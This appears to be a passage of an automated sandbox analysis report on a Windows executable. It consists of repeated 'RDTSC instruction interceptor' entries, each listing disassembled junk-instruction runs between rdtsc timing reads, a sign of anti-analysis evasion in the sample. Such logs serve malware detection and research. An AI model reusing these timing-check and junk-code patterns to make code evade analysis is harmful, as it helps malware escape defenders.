Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74927 second address: F7492D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7492D second address: F74933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74A7D second address: F74A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74A83 second address: F74A94 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jng 00007FBCC4EB33A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74A94 second address: F74AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007FBCC4DE8CD2h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74C23 second address: F74C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBCC4EB33A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74C2F second address: F74C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7F469 second address: F7F474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7E0A5 second address: F7E0D3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBCC4DE8CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FBCC4DE8CD5h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007FBCC4DE8CD7h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7E0D3 second address: F7E0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7E0E2 second address: F7E0E7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7E6C2 second address: F7E6D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FBCC4EB33A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7E6D4 second address: F7E6E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CCFh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7E6E9 second address: F7E70F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007FBCC4EB33A6h 0x00000009 jmp 00007FBCC4EB33AEh 0x0000000e pop ebx 0x0000000f js 00007FBCC4EB33B2h 0x00000015 jns 00007FBCC4EB33A6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EADE second address: F7EAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EAE4 second address: F7EAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EAEF second address: F7EAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EAF3 second address: F7EAF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EAF7 second address: F7EB1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBCC4DE8CC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FBCC4DE8CD5h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007FBCC4DE8CCDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EC7D second address: F7EC8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FBCC4EB33A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EC8C second address: F7EC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EC91 second address: F7EC9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EC9A second address: F7ECA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7ECA2 second address: F7ECC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33B5h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7ECC3 second address: F7ECCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBCC4DE8CC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7ECCF second address: F7ECD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7ECD8 second address: F7ECDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7ECDE second address: F7ECE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EE5A second address: F7EE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EE60 second address: F7EE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EE67 second address: F7EE6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EE6C second address: F7EEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnc 00007FBCC4EB33A6h 0x0000000c jo 00007FBCC4EB33A6h 0x00000012 popad 0x00000013 pushad 0x00000014 je 00007FBCC4EB33A6h 0x0000001a jmp 00007FBCC4EB33ACh 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 pushad 0x00000023 jmp 00007FBCC4EB33B1h 0x00000028 jmp 00007FBCC4EB33ABh 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EEB7 second address: F7EEBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7F30F second address: F7F32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33B6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7F32A second address: F7F337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FBCC4DE8CC6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7F337 second address: F7F347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007FBCC4EB33A6h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AA5 second address: F83AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AA9 second address: F83AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FBCC4EB33B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AC5 second address: F83ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83ACD second address: F83AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AD1 second address: F83AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AE4 second address: F83AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBCC4EB33A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AEF second address: F83AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FBCC4DE8CC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AFA second address: F83B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33ABh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83DDC second address: F83DF6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBCC4DE8CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d jnl 00007FBCC4DE8CC6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83DF6 second address: F83DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83DFA second address: F83DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8404B second address: F8406B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCC4EB33B4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8406B second address: F8406F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8406F second address: F84075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F84075 second address: F8407F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8407F second address: F84085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F84085 second address: F84089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F841F8 second address: F84225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33B2h 0x00000009 jmp 00007FBCC4EB33B3h 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F837F2 second address: F837F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F837F8 second address: F83802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBCC4EB33A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8AFD4 second address: F8AFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F107DB second address: F107E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F107E4 second address: F107E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F89E08 second address: F89E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F89E0E second address: F89E16 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8996F second address: F89973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F89973 second address: F89990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBCC4DE8CD3h 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F89990 second address: F89996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F89996 second address: F899B7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBCC4DE8CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCC4DE8CD3h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8A627 second address: F8A62D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8A77B second address: F8A783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8A90A second address: F8A910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8A910 second address: F8A943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBCC4DE8CCDh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8A943 second address: F8A953 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBCC4EB33A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8A953 second address: F8A957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F91279 second address: F912A3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBCC4EB33A6h 0x00000008 jg 00007FBCC4EB33A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jne 00007FBCC4EB33BAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F949F8 second address: F94A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBCC4DE8CCAh 0x00000010 jmp 00007FBCC4DE8CCCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F94A2C second address: F94A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F94A30 second address: F94A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F94A3B second address: F94A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F94A41 second address: F94A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F94A45 second address: F94A62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FBCC4EB33A6h 0x00000010 jmp 00007FBCC4EB33ADh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F565B2 second address: F565B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F565B8 second address: F565C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FBCC4EB33A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F565C2 second address: F565C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F566C0 second address: F566F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 xor dword ptr [esp], 7CF4FE00h 0x0000000f mov edi, dword ptr [ebp+122D38B2h] 0x00000015 call 00007FBCC4EB33A9h 0x0000001a jmp 00007FBCC4EB33B0h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F566F4 second address: F5670B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4DE8CD2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5670B second address: F56711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F569CB second address: F56A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FBCC4DE8CD8h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jng 00007FBCC4DE8CE4h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F56A04 second address: F56A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F56AC8 second address: F56ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5704E second address: F57052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F57052 second address: F5705C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBCC4DE8CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F57219 second address: F5721D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5721D second address: F57232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F9502A second address: F9502E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F9502E second address: F95034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F95034 second address: F9503A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F9994A second address: F99960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F99960 second address: F99969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
